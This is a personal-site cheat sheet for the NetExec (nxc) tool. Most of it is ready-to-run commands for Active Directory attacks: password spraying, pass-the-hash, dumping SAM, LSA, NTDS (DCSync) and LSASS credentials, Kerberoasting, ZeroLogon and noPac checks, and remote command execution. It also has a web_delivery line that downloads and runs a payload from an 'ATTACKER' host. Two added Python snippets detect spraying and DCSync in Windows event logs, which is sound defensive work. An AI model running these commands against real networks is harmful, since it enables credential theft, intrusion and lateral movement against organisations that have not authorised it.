NetExec network enumeration and Active Directory exploitation

NetExec (nxc)

NetExec guide covering SMB, LDAP, WinRM protocols for network enumeration, credential validation, lateral movement, and Active Directory attacks.

Dec 30, 2025
Updated Dec 11, 2025

Introduction

NetExec (nxc) is the successor to CrackMapExec, supporting SMB, LDAP, WinRM, SSH, MSSQL, and RDP protocols for Windows/Active Directory enumeration, credential validation, and lateral movement.

NetExec vs CrackMapExec

NetExec is the actively maintained fork of CrackMapExec. While commands are similar, NetExec includes bug fixes, new features, and better module support. Use nxc instead of crackmapexec for the latest capabilities.

Installation

# Using pipx (recommended)
pipx install git+https://github.com/Pennyw0rth/NetExec

# Or with pip
pip install netexec

# Verify installation
nxc --version

Basic Usage

Protocol Syntax

nxc <protocol> <target(s)> [options]

# Examples
nxc smb 192.168.1.0/24
nxc ldap dc01.corp.local -u user -p pass
nxc winrm 10.10.10.5 -u admin -p P@ssw0rd

SMB Enumeration

Host Discovery

# Scan network for SMB hosts
nxc smb 192.168.1.0/24

# Write hosts that do not require SMB signing to relay.txt (relay exposure check)
nxc smb 192.168.1.0/24 --gen-relay-list relay.txt

Share Enumeration

# List shares
nxc smb TARGET -u USER -p PASS --shares

# Spider shares for files
nxc smb TARGET -u USER -p PASS -M spider_plus

# Download files from shares
nxc smb TARGET -u USER -p PASS -M spider_plus -o DOWNLOAD_FLAG=true

# Get specific file
nxc smb TARGET -u USER -p PASS --share SHARE --get-file path/file.txt local.txt

User Enumeration

# Logged on users
nxc smb TARGET -u USER -p PASS --loggedon-users

# Domain users
nxc smb TARGET -u USER -p PASS --users

# RID brute force (null session)
nxc smb TARGET -u '' -p '' --rid-brute

# Extended RID brute
nxc smb TARGET -u 'guest' -p '' --rid-brute 100000

Group Enumeration

# Domain groups
nxc smb TARGET -u USER -p PASS --groups

# Local groups
nxc smb TARGET -u USER -p PASS --local-groups

Password Policy

nxc smb DC_IP -u USER -p PASS --pass-pol

Credential Validation

Username/Password

# Single credential
nxc smb TARGET -u admin -p P@ssw0rd

# Local authentication
nxc smb TARGET -u admin -p P@ssw0rd --local-auth

# Null session
nxc smb TARGET -u '' -p ''

Pass-the-Hash

# Using NTLM hash
nxc smb TARGET -u admin -H 'aad3b435b51404eeaad3b435b51404ee:cc36cf7a8514893efccd332446158b1a'

# NT hash only
nxc smb TARGET -u admin -H 'cc36cf7a8514893efccd332446158b1a'

Kerberos Authentication

# With password
nxc smb TARGET -u USER -p PASS -k

# With ticket cache
nxc smb TARGET -u USER --use-kcache

Password Spraying

# Single password against multiple users
nxc smb TARGET -u users.txt -p 'Summer2024!'

# Continue after success
nxc smb TARGET -u users.txt -p 'Summer2024!' --continue-on-success

# Multiple passwords: --no-bruteforce pairs line N of users.txt with line N of passwords.txt instead of trying every combination
nxc smb TARGET -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
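The spraying pattern above (one source, many accounts, very few attempts per account) is what a detection has to key on. This is an added example, not part of the original page or of NetExec: it runs that logic over constructed failed-logon rows (Event IDs 4625 and 4771). The thresholds and the tuple layout are assumptions; set `max_per_user` below the lockout threshold that `--pass-pol` reports for the domain.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

FAILED_LOGON_IDS = {4625, 4771}  # failed logon / Kerberos pre-authentication failed

# Constructed sample rows: (timestamp, event_id, source_ip, target_user)
SAMPLE_EVENTS = (
    [(f"2025-01-10T09:00:{i:02d}", 4625, "10.0.0.50", user)
     for i, user in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    + [(f"2025-01-10T09:01:{i:02d}", 4625, "10.0.0.77", "jsmith") for i in range(6)]
    + [("2025-01-10T09:02:00", 4625, "10.0.0.90", "alice"),
       ("2025-01-10T09:02:05", 4771, "10.0.0.90", "bob"),
       ("2025-01-10T09:03:00", 4624, "10.0.0.50", "frank")]  # success, ignored
)


def detect_spray(events, window=timedelta(minutes=5), min_users=5, max_per_user=2):
    """Return {source_ip: [users]} for sources whose failures inside one window
    hit at least min_users distinct accounts with at most max_per_user tries each."""
    by_source = defaultdict(list)
    for ts, event_id, source, user in events:
        if event_id in FAILED_LOGON_IDS:
            by_source[source].append((datetime.fromisoformat(ts), user.lower()))

    alerts = {}
    for source, rows in by_source.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1  # slide the window forward
            per_user = Counter(user for _, user in rows[start:end + 1])
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                alerts[source] = sorted(per_user)
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for source, users in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible spray from {source}: {len(users)} accounts, e.g. {users[:3]}")
```

The repeated failures against the single account `jsmith` are not flagged, because that is a brute-force or lockout pattern rather than a spray.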

Credential Dumping

SAM Database

nxc smb TARGET -u admin -p PASS --sam
nxc smb TARGET -u admin -H HASH --sam --local-auth

LSA Secrets

nxc smb TARGET -u admin -p PASS --lsa

NTDS.dit (Domain Controller)

# Via DRSUAPI (DCSync)
nxc smb DC -u admin -p PASS --ntds

# Via VSS
nxc smb DC -u admin -p PASS --ntds vss

# Single user
nxc smb DC -u admin -p PASS --ntds --user targetuser
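The DRSUAPI path above requests directory replication, which a domain controller records as Event ID 4662 carrying the replication extended-right GUIDs. This is an added detection example, not part of the original page: it flags those events when the requesting account is not a known domain controller. The event dictionaries are constructed, the `dc_accounts` allowlist is an assumption, and it assumes Directory Service Access auditing is enabled so that 4662 is logged.

```python
import re

# Extended rights that directory replication (and therefore DCSync) relies on.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Constructed 4662 events (field names follow the Security log; values are samples).
SAMPLE_4662 = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "admin", "AccessMask": "0x100",
     "Properties": "{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Unrelated object access with a constructed placeholder GUID.
    {"EventID": 4662, "SubjectUserName": "helpdesk", "AccessMask": "0x10",
     "Properties": "{00000000-0000-0000-0000-000000000001}"},
]


def find_replication_requests(events, dc_accounts):
    """Return (account, [rights]) for replication rights used by non-DC accounts."""
    allowed = {name.lower() for name in dc_accounts}
    findings = []
    for event in events:
        if event.get("EventID") != 4662:
            continue
        guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & REPLICATION_RIGHTS.keys())
        account = event.get("SubjectUserName", "")
        if rights and account.lower() not in allowed:
            findings.append((account, rights))
    return findings


if __name__ == "__main__":
    for account, rights in find_replication_requests(SAMPLE_4662, {"DC01$"}):
        print(f"replication requested by non-DC account {account}: {', '.join(rights)}")
```

Legitimate sync services that replicate directory data need to be added to the allowlist, or they will appear as findings.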

LSASS Memory

# Using lsassy module
nxc smb TARGET -u admin -p PASS -M lsassy

# Using nanodump
nxc smb TARGET -u admin -p PASS -M nanodump

DPAPI Secrets

nxc smb TARGET -u admin -p PASS --dpapi

Command Execution

# Execute command
nxc smb TARGET -u admin -p PASS -x 'whoami'

# PowerShell command
nxc smb TARGET -u admin -p PASS -X 'Get-Process'

# Specify execution method
nxc smb TARGET -u admin -p PASS -x 'whoami' --exec-method smbexec
# Methods: smbexec, wmiexec, atexec, mmcexec

LDAP Operations

Enumeration

# AS-REP roastable users
nxc ldap DC -u USER -p PASS --asreproast asrep.txt

# Kerberoastable users
nxc ldap DC -u USER -p PASS --kerberoasting kerb.txt

# User descriptions
nxc ldap DC -u USER -p PASS -M get-desc-users

# GMSA passwords
nxc ldap DC -u USER -p PASS --gmsa

BloodHound Collection

nxc ldap DC -u USER -p PASS --bloodhound -ns DC_IP -c all

Vulnerability Checks

# The zerologon, petitpotam and nopac modules are loaded through the smb protocol

# ZeroLogon
nxc smb DC -u '' -p '' -M zerologon

# PetitPotam
nxc smb DC -u '' -p '' -M petitpotam

# noPac
nxc smb DC -u USER -p PASS -M nopac

# LDAP signing
nxc ldap DC -u USER -p PASS -M ldap-checker

WinRM Access

# Check WinRM access
nxc winrm TARGET -u admin -p PASS

# Execute commands
nxc winrm TARGET -u admin -p PASS -x 'whoami'

# Spray across subnet
nxc winrm 192.168.1.0/24 -u admin -p PASS -d corp.local

Useful Modules

Information Gathering

# Web delivery (download and execute)
nxc smb TARGET -u USER -p PASS -M web_delivery -o URL=http://ATTACKER/payload

# GPP passwords
nxc smb TARGET -u USER -p PASS -M gpp_password
nxc smb TARGET -u USER -p PASS -M gpp_autologin

# ADCS enumeration
nxc ldap DC -u USER -p PASS -M adcs

# Network information
nxc ldap DC -u USER -p PASS -M get-network -o ALL=true

List All Modules

nxc smb -L
nxc ldap -L
nxc winrm -L

Output and Logging

# Export to file (--log writes the run's output to a file; -o is reserved for module options)
nxc smb TARGET -u USER -p PASS --sam --log output.txt

# JSON output
nxc smb TARGET -u USER -p PASS --sam --export json

# Database location
~/.nxc/logs/
~/.nxc/nxc.db


NetExec (nxc) | Drake Axelrod